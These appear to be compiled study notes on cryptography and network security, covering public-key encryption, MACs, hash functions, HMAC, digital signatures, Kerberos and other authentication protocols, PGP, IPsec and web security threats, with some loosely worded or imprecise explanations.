Public key Cryptosystem − Asymmetric algorithms depends on one key for encryption and
a distinct but related key for decryption. These algorithms have the following characteristics
which are as follows −
• It is computationally infeasible to decide the decryption key given only
information of the cryptographic algorithm and the encryption key.
• There are two related keys such as one can be used for encryption, with the
other used for decryption.
A public key encryption scheme has the following ingredients which are as follows −
• Plaintext − This is the readable message or information that is informer into the
algorithm as input.
• Encryption algorithm − The encryption algorithm performs several conversion
on the plaintext.
• Public and Private keys − This is a set of keys that have been selected so that
if one can be used for encryption, and the other can be used for decryption.
• Ciphertext − This is scrambled message generated as output. It based on the
plaintext and the key. For a given message, there are two specific keys will
create two different ciphertexts.
• Decryption Algorithm − This algorithm get the ciphertext and the matching
key and create the original plaintext.
The keys generated in public key cryptography are too large including 512, 1024, 2048 and
so on bits. These keys are not simply to learn. Thus, they are maintained in the devices
including USB tokens or hardware security modules.
The major issue in public key cryptosystems is that an attacker can masquerade as a legal
user. It can substitutes the public key with a fake key in the public directory. Moreover, it can
intercepts the connection or alters those keys.
Public key cryptography plays an essential role in online payment services and ecommerce
etc. These online services are ensure only when the authenticity of public key and signature
of the user are ensure.
The asymmetric cryptosystem should manage the security services including confidentiality,
authentication, integrity and non-repudiation. The public key should support the security
services including non-repudiation and authentication. The security services of confidentiality
and integrity considered as an element of encryption process completed by private key of the
user.

Q2: RSA Algorithm (Refer Notes)

Q3: Message Authentication:

Another type of threat that exist for data is the lack of message authentication. In this threat,
the user is not sure about the originator of the message. Message authentication can be
provided using the cryptographic techniques that use secret keys as done in case of
encryption.
Message Authentication Code (MAC)
MAC algorithm is a symmetric key cryptographic technique to provide message
authentication. For establishing MAC process, the sender and receiver share a symmetric key
K.
Essentially, a MAC is an encrypted checksum generated on the underlying message that is
sent along with a message to ensure message authentication.
The process of using MAC for authentication is depicted in the following illustration −

Let us now try to understand the entire process in detail −

• The sender uses some publicly known MAC algorithm, inputs the message and
the secret key K and produces a MAC value.
• Similar to hash, MAC function also compresses an arbitrary long input into a
fixed length output. The major difference between hash and MAC is that MAC
uses secret key during the compression.
• The sender forwards the message along with the MAC. Here, we assume that
the message is sent in the clear, as we are concerned of providing message
origin authentication, not confidentiality. If confidentiality is required then the
message needs encryption.
• On receipt of the message and the MAC, the receiver feeds the received
message and the shared secret key K into the MAC algorithm and re-computes
the MAC value.
• The receiver now checks equality of freshly computed MAC with the MAC
received from the sender. If they match, then the receiver accepts the message
and assures himself that the message has been sent by the intended sender.
• If the computed MAC does not match the MAC sent by the sender, the receiver
cannot determine whether it is the message that has been altered or it is the
origin that has been falsified. As a bottom-line, a receiver safely assumes that
the message is not the genuine.
Limitations of MAC
There are two major limitations of MAC, both due to its symmetric nature of operation −
• Establishment of Shared Secret.
o It can provide message authentication among pre-decided
legitimate users who have shared key.
o This requires establishment of shared secret prior to use of MAC.
• Inability to Provide Non-Repudiation
o Non-repudiation is the assurance that a message originator
cannot deny any previously sent messages and commitments or
actions.
 o MAC technique does not provide a non-repudiation service. If the
sender and receiver get involved in a dispute over message
origination, MACs cannot provide a proof that a message was
indeed sent by the sender.
o Though no third party can compute the MAC, still sender could
deny having sent the message and claim that the receiver forged
it, as it is impossible to determine which of the two parties
computed the MAC.

Q4: Hash Functions:

Hash functions are extremely useful and appear in almost all information security applications.
A hash function is a mathematical function that converts a numerical input value into another
compressed numerical value. The input to the hash function is of arbitrary length but output is
always of fixed length.
Values returned by a hash function are called message digest or simply hash values. The
following picture illustrated hash function −

Features of Hash Functions

The typical features of hash functions are −
• Fixed Length Output (Hash Value)
o Hash function coverts data of arbitrary length to a fixed length.
This process is often referred to as hashing the data.
o In general, the hash is much smaller than the input data, hence
hash functions are sometimes called compression functions.
o Since a hash is a smaller representation of a larger data, it is also
referred to as a digest.
o Hash function with n bit output is referred to as an n-bit hash
function. Popular hash functions generate values between 160
and 512 bits.
• Efficiency of Operation
o Generally for any hash function h with input x, computation of
h(x) is a fast operation.
 o
Computationally hash functions are much faster than a
symmetric encryption.
Properties of Hash Functions
In order to be an effective cryptographic tool, the hash function is desired to possess following
properties −
•Pre-Image Resistance
o This property means that it should be computationally hard to
reverse a hash function.
o In other words, if a hash function h produced a hash value z, then
it should be a difficult process to find any input value x that
hashes to z.
o This property protects against an attacker who only has a hash
value and is trying to find the input.
• Second Pre-Image Resistance
o This property means given an input and its hash, it should be
hard to find a different input with the same hash.
o In other words, if a hash function h for an input x produces hash
value h(x), then it should be difficult to find any other input value
y such that h(y) = h(x).
o This property of hash function protects against an attacker who
has an input value and its hash, and wants to substitute different
value as legitimate value in place of original input value.
• Collision Resistance
o This property means it should be hard to find two different inputs
of any length that result in the same hash. This property is also
referred to as collision free hash function.
o In other words, for a hash function h, it is hard to find any two
different inputs x and y such that h(x) = h(y).
o Since, hash function is compressing function with fixed hash
length, it is impossible for a hash function not to have collisions.
This property of collision free only confirms that these collisions
should be hard to find.
o This property makes it very difficult for an attacker to find two
input values with the same hash.
o Also, if a hash function is collision-resistant then it is second
pre-image resistant.
Design of Hashing Algorithms
At the heart of a hashing is a mathematical function that operates on two fixed-size blocks of
data to create a hash code. This hash function forms the part of the hashing algorithm.
The size of each data block varies depending on the algorithm. Typically the block sizes are
from 128 bits to 512 bits. The following illustration demonstrates hash function −
Hashing algorithm involves rounds of above hash function like a block cipher. Each round
takes an input of a fixed size, typically a combination of the most recent message block and
the output of the last round.
This process is repeated for as many rounds as are required to hash the entire message.
Schematic of hashing algorithm is depicted in the following illustration −

Since, the hash value of first message block becomes an input to the second hash operation,
output of which alters the result of the third operation, and so on. This effect, known as
an avalanche effect of hashing.
Avalanche effect results in substantially different hash values for two messages that differ by
even a single bit of data.
Understand the difference between hash function and algorithm correctly. The hash function
generates a hash code by operating on two blocks of fixed-length binary data.
Hashing algorithm is a process for using the hash function, specifying how the message will
be broken up and how the results from previous message blocks are chained together.
Popular Hash Functions
Let us briefly see some popular hash functions −
Message Digest (MD)
MD5 was most popular and widely used hash function for quite some years.
• The MD family comprises of hash functions MD2, MD4, MD5 and MD6. It was
adopted as Internet Standard RFC 1321. It is a 128-bit hash function.
• MD5 digests have been widely used in the software world to provide assurance
about integrity of transferred file. For example, file servers often provide a pre-
computed MD5 checksum for the files, so that a user can compare the
checksum of the downloaded file to it.
• In 2004, collisions were found in MD5. An analytical attack was reported to be
successful only in an hour by using computer cluster. This collision attack
resulted in compromised MD5 and hence it is no longer recommended for use.
Secure Hash Function (SHA)
Family of SHA comprise of four SHA algorithms; SHA-0, SHA-1, SHA-2, and SHA-3. Though
from same family, there are structurally different.
• The original version is SHA-0, a 160-bit hash function, was published by the
National Institute of Standards and Technology (NIST) in 1993. It had few
weaknesses and did not become very popular. Later in 1995, SHA-1 was
designed to correct alleged weaknesses of SHA-0.
• SHA-1 is the most widely used of the existing SHA hash functions. It is
employed in several widely used applications and protocols including Secure
Socket Layer (SSL) security.
• In 2005, a method was found for uncovering collisions for SHA-1 within practical
time frame making long-term employability of SHA-1 doubtful.
 • SHA-2 family has four further SHA variants, SHA-224, SHA-256, SHA-384, and
SHA-512 depending up on number of bits in their hash value. No successful
attacks have yet been reported on SHA-2 hash function.
• Though SHA-2 is a strong hash function. Though significantly different, its basic
design is still follows design of SHA-1. Hence, NIST called for new competitive
hash function designs.
• In October 2012, the NIST chose the Keccak algorithm as the new SHA-3
standard. Keccak offers many benefits, such as efficient performance and good
resistance for attacks.

Applications of Hash Functions

• Password Storage
• Data Integrity Check

Q5: Hash on MAC Algorithms:

HMAC algorithm stands for Hashed or Hash based Message Authentication Code. It is a
result of work done on developing a MAC derived from cryptographic hash functions. HMAC
is a great resistant towards cryptanalysis attacks as it uses the Hashing concept twice.
HMAC consists of twin benefits of Hashing and MAC, and thus is more secure than any
other authentication codes. RFC 2104 has issued HMAC, and HMAC has been made
compulsory to implement in IP security. The FIPS 198 NIST standard has also issued
HMAC.

Objectives –
As the Hash Function, HMAC is also aimed to be one way, i.e, easy to generate output from
input but complex the other way round.
It aims at being less effected by collisions than the hash functions.
HMAC reuses the algorithms like MD5 and SHA-1 and checks to replace the embedded
hash functions with more secure hash functions, in case found.
HMAC tries to handle the Keys in more simple manner.

HMAC Algorithm–
The working of HMAC starts with taking a message M containing blocks of length b bits. An
input signature is padded to the left of the message and the whole is given as input to a
hash function which gives us a temporary message digest MD’. MD’ again is appended to an
output signature and the whole is applied a hash function again, the result is our final
message digest MD.
Here is a simple structure of HMAC:
Here,

H stands for Hashing function,

M is original message
Si and So are input and output signatures respectively,
Yi is the ith block in original message M, where i ranges from [1, L)
L = the count of blocks in M
K is the secret key used for hashing
IV is an initial vector (some constant)
The generation of input signature and output signature Si and So respectively.
Q6: Digi Signatures and Authentication Protocols:

A digital signature is a mathematical technique which validates the authenticity and integrity
of a message, software or digital documents. It allows us to verify the author name, date and
time of signatures, and authenticate the message contents. The digital signature offers far
more inherent security and intended to solve the problem of tampering and impersonation
(Intentionally copy another person's characteristics) in digital communications.

The computer-based business information authentication interrelates both technology and the
law. It also calls for cooperation between the people of different professional backgrounds and
areas of expertise. The digital signatures are different from other electronic signatures not only
in terms of process and result, but also it makes digital signatures more serviceable for legal
purposes. Some electronic signatures that legally recognizable as signatures may not be
secure as digital signatures and may lead to uncertainty and disputes.

Application of Digital Signature

The important reason to implement digital signature to communication is:

o Authentication
o Non-repudiation
o Integrity

Authentication

Authentication is a process which verifies the identity of a user who wants to access the
system. In the digital signature, authentication helps to authenticate the sources of messages.

Non-repudiation

Non-repudiation means assurance of something that cannot be denied. It ensures that

someone to a contract or communication cannot later deny the authenticity of their signature
on a document or in a file or the sending of a message that they originated.

Integrity

Integrity ensures that the message is real, accurate and safeguards from unauthorized user
modification during the transmission.

Algorithms in Digital Signature

A digital signature consists of three algorithms:

1. Key generation algorithm

The key generation algorithm selects private key randomly from a set of possible private keys.
This algorithm provides the private key and its corresponding public key.

2. Signing algorithm
A signing algorithm produces a signature for the document.

3. Signature verifying algorithm

A signature verifying algorithm either accepts or rejects the document's authenticity.

How digital signatures work

Digital signatures are created and verified by using public key cryptography, also known as
asymmetric cryptography. By the use of a public key algorithm, such as RSA, one can
generate two keys that are mathematically linked- one is a private key, and another is a public
key.

The user who is creating the digital signature uses their own private key to encrypt the
signature-related document. There is only one way to decrypt that document is with the use
of signer's public key.

This technology requires all the parties to trust that the individual who creates the signature
has been able to keep their private key secret. If someone has access the signer's private key,
there is a possibility that they could create fraudulent signatures in the name of the private key
holder.

The steps which are followed in creating a digital signature are:

1. Select a file to be digitally signed.

2. The hash value of the message or file content is calculated. This message or file
content is encrypted by using a private key of a sender to form the digital signature.
3. Now, the original message or file content along with the digital signature is transmitted.
4. The receiver decrypts the digital signature by using a public key of a sender.
5. The receiver now has the message or file content and can compute it.
6. Comparing these computed message or file content with the original computed
message. The comparison needs to be the same for ensuring integrity.

Types of Digital Signature

Different document processing platform supports different types of digital signature. They are
described below:
Certified Signatures

The certified digital signature documents display a unique blue ribbon across the top of the
document. The certified signature contains the name of the document signer and the certificate
issuer which indicate the authorship and authenticity of the document.

Approval Signatures

The approval digital signatures on a document can be used in the organization's business
workflow. They help to optimize the organization's approval procedure. The procedure
involves capturing approvals made by us and other individuals and embedding them within
the PDF document. The approval signatures to include details such as an image of our
physical signature, location, date, and official seal.

Visible Digital Signature

The visible digital signature allows a user to sign a single document digitally. This signature
appears on a document in the same way as signatures are signed on a physical document.

Invisible Digital Signature

The invisible digital signatures carry a visual indication of a blue ribbon within a document in
the taskbar. We can use invisible digital signatures when we do not have or do not want to
display our signature but need to provide the authenticity of the document, its integrity, and its
origin.

Q7 authentication protocols:

User authentication is the first most priority while responding to the request made by the
user to the software application. There are several mechanisms made which are required
to authenticate the access while providing access to the data. In this blog, we will explore
the most common authentication protocols and will try to explore their merits and
demerits.
1. Kerberos :
Kerberos is a protocol that aids in network authentication. This is used for validating
clients/servers during a network employing a cryptographic key. It is designed for
executing strong authentication while reporting to applications. The overall implementation
of the Kerberos protocol is openly available by MIT and is used in many mass-produced
products.

Some advantages of Kerberos :

• It supports various operating systems.
• The authentication key is shared much efficiently than public sharing.
Some disadvantages of Kerberos :
• It is used only to authenticate clients and services used by them.
• It shows vulnerability to soft or weak passwords.
2. Lightweight Directory Access Protocol (LDAP) :
LDAP refers to Lightweight Directory Access Protocol. It is a protocol that is used for
determining any individuals, organizations, and other devices during a network regardless
of being on public or corporate internet. It is practiced as Directories-as-a-Service and is
the grounds for Microsoft building Activity Directory.
Some advantages of LDAP :
• It is an automated protocol which makes it modernizing easier.
• It supports existing technologies and allows multiple directories.
Some disadvantages of LDAP :
• It requires the experience of deployment.
• The directory servers are required to be LDAP obedient for deployment.
3. OAuth2 :
OAuth as the name suggests it is an authorization framework that promotes granting
limited access to the user on its account through an HTTP service. When a user requests
access to resources an API call is made and after the authentication token is passed.
Some advantages of OAuth2 :
• It is a simple protocol and is easy to implement.
• It provides server-side authorization of code.
Some disadvantages of OAuth2 :
• It is vulnerable to manage different sets of code.
• It shows serious effects on sites connected to another affected system.
4. SAML :
SAML stands for Security Assertion Markup Language which is based on XML-based
authentication data format which provides the authorization between an identity provider
and service provider. It serves as a product of the OASIS Security Services Technical
Committee.
Some advantages of SAML :
• It reduced the administrative costs for the end-users.
• It provides a single sign-in for authenticating across service providers.
Some disadvantages of SAML :
• It is dependent on the identity provider.
• All the data is managed in a single XML format.
5. RADIUS :
RADIUS stands for Remote Authentication Dial-In User Service. It is a network protocol
that provides sufficient centralized Authentication, Accounting, and Authorization for the
users that use and network services. The functioning of the protocol occurs when the user
requests access to network resources, where the RADIUS server encrypts the credentials
which are entered by the user. After this, the user credentials are mapped through the
local database and provide access.

Some advantages of RADIUS :

• It is a great mechanism for providing multiple access for Admins.
• It provides a unique identity to each user in a session.
Some disadvantages of RADIUS :
 • Initial implementation for this mechanism is hard on hardware.
• It has a variety of models that may require a special team which is cost
consuming.

Q8 Authentication Applications:

1. KERBEROS

Kerberos provides a centralized authentication server whose function is to authenticate users

to servers and servers to users. Kerberos relies exclusively on conventional encryption,
making no use of public-key encryption.

The following are the requirements for Kerberos:

Secure: A network eavesdropper should not be able to obtain the necessary information
to impersonate a user. More generally, Kerberos should be strong enough that a potential
opponent does not find it to be the weak link.

Reliable: For all services that rely on Kerberos for access control, lack of availability of
the Kerberos service means lack of availability of the supported services. Hence, Kerberos
should be highly reliable and should employ a distributed server architecture, with one system
able to back up another.

Transparent: Ideally, the user should not be aware that authentication is taking place,
beyond the requirement to enter a password.

Scalable: The system should be capable of supporting large numbers of clients and
servers. This suggests a modular, distributed architecture.

To support these requirements, the overall scheme of Kerberos is that of a trusted third-party
authentication service that uses a protocol based on that proposed by Needham and
Schroeder [NEED78] It is trusted in the sense that clients and servers trust Kerberos to
mediate their mutual authentication. Assuming the Kerberos protocol is well designed, then
the authentication service is secure if the Kerberos server itself is secure.

A Simple Authentication Dialogue

In an unprotected network environment, any client can apply to any server for service.

The obvious security risk is that of impersonation. To counter this threat, servers must be able
to confirm the identities of clients who request service. But in an open environment, this places
a substantial burden on each server.

An alternative is to use an authentication server (AS) that knows the passwords of all
users and stores these in a centralized database. In addition, the AS shares a unique
secret key with each server.

The simple authentication dialogue is as follows:

 C >> AS: IDc||Pc||IDv

AS >> C: Ticket

C >> V: IDc||Ticket Ticket=

EKv(IDc||ADc||IDv)

C: Client,

AS: Authentication Server,

V: Server,

IDv : ID of the server,

IDc : ID of the client,

Pc:Password of the client,

ADc: Address of client,

Kv: secret key shared by AS and V, ||: concatenation.

2. A More Secure Authentication Dialogue

There are two major problems associated with the previous approach:

Plaintext transmission of the password.

Each time a user has to enter the password.

To solve these problems, we introduce a scheme for avoiding plaintext passwords, and anew
server, known as ticket granting server (TGS). The hypothetical scenario is as follows:

Once per user logon session:

C >> AS: IDc||IDtgs

AS >> C: Ekc (Tickettgs)

Once per type of service:

C >> TGS: IDc||IDv||Tickettgs

TGS >> C: ticketv

Once per service session: 5. C >> V: IDc||ticketv

Tickettgs= Ektgs(IDc||ADc||IDtgs||TS1||Lifetime1)Ticketv =

Ekv(IDc||ADc||IDv||TS2||Lifetime2)

C: Client, AS: Authentication Server,

V: Server,

IDc : ID of the client,

Pc:Password of the client,

ADc: Address of client,

IDv : ID of the server,

Kv: secret key shared by AS and V, ||: concatenation,

IDtgs: ID of the TGS server,

TS1, TS2: time stamps, lifetime: lifetime of the ticket.

The new service, TGS, issues tickets to users who have been authenticated to AS. Thus, the
user first requests a ticket-granting ticket (Tickettgs) from the AS. The client module in the user
workstation saves this ticket. Each time the user requires access to a new service, the client
applies to the TGS, using the ticket to authenticate itself. The TGS then grants a ticket for the
particular service. The client saves each service-granting ticket and uses it to authenticate its
user to a server each time a particular service is requested.
 7. BASIC OVERVIEW OF: e-mail, IP & WEB Security

Q1: Electronic mail Security

PGP (Pretty Good Privacy), is a popular program that is used to provide confidentiality
and authentication services for electronic mail and file storage. It was designed by Phil
Zimmermann way back in 1991. He designed it in such a way, that the best cryptographic
algorithms such as RSA, Diffie-Hellman key exchange, DSS are used for the public-key
encryption (or) asymmetric encryption; CAST-128, 3DES, IDEA are used for symmetric
encryption and SHA-1 is used for hashing purposes. PGP software is an open source one
and is not dependent on either the OS (Operating System) or the processor. The
application is based on a few commands which are very easy to use.
The following are the services offered by PGP:

1. Authentication
2. Confidentiality
3. Compression
4. Email Compatibility
5. Segmentation

In this article, we will see about Authentication and Confidentiality.

1. Authentication:

Authentication basically means something that is used to validate something as true or

real. To login into some sites sometimes we give our account name and password, that is
an authentication verification procedure.
In the email world, checking the authenticity of an email is nothing but to check whether it
actually came from the person it says. In emails, authentication has to be checked as there
are some people who spoof the emails or some spams and sometimes it can cause a lot of
inconvenience. The Authentication service in PGP is provided as follows:

As shown in the above figure, the Hash Function (H) calculates the Hash Value of the
message. For the hashing purpose, SHA-1 is used and it produces a 160 bit output hash
value. Then, using the sender’s private key (KPa), it is encrypted and it’s called as Digital
Signature. The Message is then appended to the signature. All the process happened till
now, is sometimes described as signing the message . Then the message is compressed
to reduce the transmission overhead and is sent over to the receiver.

At the receiver’s end, the data is decompressed and the message, signature are obtained.
The signature is then decrypted using the sender’s public key(PUa) and the hash value is
obtained. The message is again passed to hash function and it’s hash value is calculated
and obtained.
Both the values, one from signature and another from the recent output of hash function
are compared and if both are same, it means that the email is actually sent from a known
one and is legit, else it means that it’s not a legit one.
2. Confidentiality:

Sometimes we see some packages labelled as ‘Confidential’, which means that those
packages are not meant for all the people and only selected persons can see them. The
same applies to the email confidentiality as well. Here, in the email service, only the
sender and the receiver should be able to read the message, that means the contents
have to be kept secret from every other person, except for those two.
PGP provides that Confidentiality service in the following manner:

The message is first compressed and a 128 bit session key (K s), generated by the PGP, is
used to encrypt the message through symmetric encryption. Then, the session key (K s)
itself gets encrypted through public key encryption (EP) using receiver’s public key(KU b) .
Both the encrypted entities are now concatenated and sent to the receiver.
As you can see, the original message was compressed and then encrypted initially and
hence even if any one could get hold of the traffic, he cannot read the contents as they are
not in readable form and they can only read them if they had the session key (K s). Even
though session key is transmitted to the receiver and hence, is in the traffic, it is in
encrypted form and only the receiver’s private key (KP b)can be used to decrypt that and
thus our message would be completely safe.
At the receiver’s end, the encrypted session key is decrypted using receiver’s private key
(KPb) and the message is decrypted with the obtained session key. Then, the message is
decompressed to obtain the original message (M).
RSA algorithm is used for the public-key encryption and for the symmetric key encryption,
CAST-128(or IDEA or 3DES) is used.
Practically, both the Authentication and Confidentiality services are provided in parallel as
follows :
Note:
M – Message
H – Hash Function
Ks – A random Session Key created for Symmetric Encryption purpose
DP – Public-Key Decryption Algorithm
EP – Public-Key Encryption Algorithm
DC – Asymmetric Decryption Algorithm
EC – Symmetric Encryption Algorithm
KPb – A private key of user B used in Public-key encryption process
KPa – A private key of user A used in Public-key encryption process
PUa – A public key of user A used in Public-key encryption process
PUb – A public key of user B used in Public-key encryption process
|| – Concatenation
Z – Compression Function
Z-1 – Decompression Function

E-mail Hacking
Email hacking can be done in any of the following ways:
• Spam
• Virus
• Phishing
Spam
E-mail spamming is an act of sending Unsolicited Bulk E-mails (UBI) which one has not
asked for. Email spams are the junk mails sent by commercial companies as an advertisement
of their products and services.
Virus
Some emails may incorporate with files containing malicious script which when run on your
computer may lead to destroy your important data.
Phishing
Email phishing is an activity of sending emails to a user claiming to be a legitimate enterprise.
Its main purpose is to steal sensitive information such as usernames, passwords, and credit
card details.
Such emails contains link to websites that are infected with malware and direct the user to
enter details at a fake website whose look and feels are same to legitimate one.
E-mail Spamming and Junk Mails
Email spamming is an act of sending Unsolicited Bulk E-mails (UBI) which one has not asked
for. Email spams are the junk mails sent by commercial companies as an advertisement of
their products and services.
Spams may cause the following problems:
• It floods your e-mail account with unwanted e-mails, which may result in loss of
important e-mails if inbox is full.
• Time and energy is wasted in reviewing and deleting junk emails or spams.
• It consumes the bandwidth that slows the speed with which mails are delivered.
• Some unsolicited email may contain virus that can cause harm to your
computer.
Blocking Spams
Following ways will help you to reduce spams:
• While posting letters to newsgroups or mailing list, use a separate e-mail
address than the one you used for your personal e-mails.
• Don’t give your email address on the websites as it can easily be spammed.
• Avoid replying to emails which you have received from unknown persons.
• Never buy anything in response to a spam that advertises a product.
E-mail Cleanup and Archiving
In order to have light weighted Inbox, it’s good to archive your inbox from time to time. Here I
will discuss the steps to clean up and archive your Outlook inbox.
• Select File tab on the mail pane.
• Select Cleanup Tools button on account information screen.
• Select Archive from cleanup tools drop down menu.
• Select Archive this folder and all subfolders option and then click on the
folder that you want to archive. Select the date from the Archive items older
than: list. Click Browse to create new .pst file name and location. Click OK.

Q2: IP Security:

The IP security (IPSec) is an Internet Engineering Task Force (IETF) standard suite of
protocols between 2 communication points across the IP network that provide data
authentication, integrity, and confidentiality. It also defines the encrypted, decrypted and
authenticated packets. The protocols needed for secure key exchange and key
management are defined in it.
Uses of IP Security –
IPsec can be used to do the following things:
• To encrypt application layer data.
• To provide security for routers sending routing data across the public internet.
• To provide authentication without encryption, like to authenticate that the data
originates from a known sender.
• To protect network data by setting up circuits using IPsec tunneling in which all
data is being sent between the two endpoints is encrypted, as with a Virtual
Private Network(VPN) connection.
Components of IP Security –
It has the following components:
1. Encapsulating Security Payload (ESP) –
It provides data integrity, encryption, authentication and anti replay. It also
provides authentication for payload.
2. Authentication Header (AH) –
It also provides data integrity, authentication and anti replay and it does not
 provide encryption. The anti replay protection, protects against unauthorized
transmission of packets. It does not protect data’s confidentiality.

3. Internet Key Exchange (IKE) –

It is a network security protocol designed to dynamically exchange encryption
keys and find a way over Security Association (SA) between 2 devices. The
Security Association (SA) establishes shared security attributes between 2
network entities to support secure communication. The Key Management
Protocol (ISAKMP) and Internet Security Association which provides a
framework for authentication and key exchange. ISAKMP tells how the set up of
the Security Associations (SAs) and how direct connections between two hosts
that are using IPsec.
Internet Key Exchange (IKE) provides message content protection and also an
open frame for implementing standard algorithms such as SHA and MD5. The
algorithm’s IP sec users produces a unique identifier for each packet. This
identifier then allows a device to determine whether a packet has been correct
or not. Packets which are not authorized are discarded and not given to
receiver.

Working of IP Security –
1. The host checks if the packet should be transmitted using IPsec or not. These
packet traffic triggers the security policy for themselves. This is done when the
system sending the packet apply an appropriate encryption. The incoming
packets are also checked by the host that they are encrypted properly or not.
2. Then the IKE Phase 1 starts in which the 2 hosts( using IPsec ) authenticate
themselves to each other to start a secure channel. It has 2 modes. The Main
mode which provides the greater security and the Aggressive mode which
enables the host to establish an IPsec circuit more quickly.
 3. The channel created in the last step is then used to securely negotiate the way
the IP circuit will encrypt data across the IP circuit.
4. Now, the IKE Phase 2 is conducted over the secure channel in which the two
hosts negotiate the type of cryptographic algorithms to use on the session and
agreeing on secret keying material to be used with those algorithms.
5. Then the data is exchanged across the newly created IPsec encrypted tunnel.
These packets are encrypted and decrypted by the hosts using IPsec SAs.
6. When the communication between the hosts is completed or the session times
out then the IPsec tunnel is terminated by discarding the keys by both the
hosts.

Q3: WEB Security:

Web Security is very important nowadays. Websites are always prone to security
threats/risks. Web Security deals with the security of data over the internet/network or web
or while it is being transferred to the internet. For e.g. when you are transferring data
between client and server and you have to protect that data that security of data is your web
security.
Hacking a Website may result in the theft of Important Customer Data, it may be the credit
card information or the login details of a customer or it can be the destruction of one’s
business and propagation of illegal content to the users while somebody hacks your website
they can either steal the important information of the customers or they can even propagate
the illegal content to your users through your website so, therefore, security considerations
are needed in the context of web security.

Security Threats:

A Threat is nothing but a possible event that can damage and harm an information system.
Security Threat is defined as a risk that which, can potentially harm Computer systems &
organizations. Whenever an Individual or an Organization creates a website, they are
vulnerable to security attacks.
Security attacks are mainly aimed at stealing altering or destroying a piece of personal and
confidential information, stealing the hard drive space, and illegally accessing passwords.
So whenever the website you created is vulnerable to security attacks then the attacks are
going to steal your data alter your data destroy your personal information see your
confidential information and also it accessing your password.

Top Web Security Threats :

Web security threats are constantly emerging and evolving, but many threats consistently
appear at the top of the list of web security threats. These include:
• Cross-site scripting (XSS)
• SQL Injection
• Phishing
• Ransomware
• Code Injection
• Viruses and worms
• Spyware
• Denial of Service
Security Consideration:

• Updated Software: You need to always update your software. Hackers may be
aware of vulnerabilities in certain software, which are sometimes caused by bugs
and can be used to damage your computer system and steal personal data. Older
versions of software can become a gateway for hackers to enter your network.
Software makers soon become aware of these vulnerabilities and will fix
vulnerable or exposed areas. That’s why It is mandatory to keep your software
updated, It plays an important role in keeping your personal data secure.
• Beware of SQL Injection: SQL Injection is an attempt to manipulate your data
or your database by inserting a rough code into your query. For e.g. somebody
can send a query to your website and this query can be a rough code while it gets
executed it can be used to manipulate your database such as change tables,
modify or delete data or it can retrieve important information also so, one should
be aware of the SQL injection attack.
• Cross-Site Scripting (XSS): XSS allows the attackers to insert client-side
script into web pages. E.g. Submission of forms. It is a term used to describe a
class of attacks that allow an attacker to inject client-side scripts into other users’
browsers through a website. As the injected code enters the browser from the
site, the code is reliable and can do things like sending the user’s site
authorization cookie to the attacker.
• Error Messages: You need to be very careful about error messages which are
generated to give the information to the users while users access the website and
some error messages are generated due to one or another reason and you
should be very careful while providing the information to the users. For e.g. login
attempt – If the user fails to login the error message should not let the user know
which field is incorrect: Username or Password.
• Data Validation: Data validation is the proper testing of any input supplied by
the user or application. It prevents improperly created data from entering the
information system. Validation of data should be performed on both server-side
and client-side. If we perform data validation on both sides that will give us the
authentication. Data validation should occur when data is received from an
outside party, especially if the data is from untrusted sources.
• Password: Password provides the first line of defense against unauthorized
access to your device and personal information. It is necessary to use a strong
password. Hackers in many cases use sophisticated software that uses brute
force to crack passwords. Passwords must be complex to protect against brute
force. It is good to enforce password requirements such as a minimum of eight
characters long must including uppercase letters, lowercase letters, special
characters, and numerals.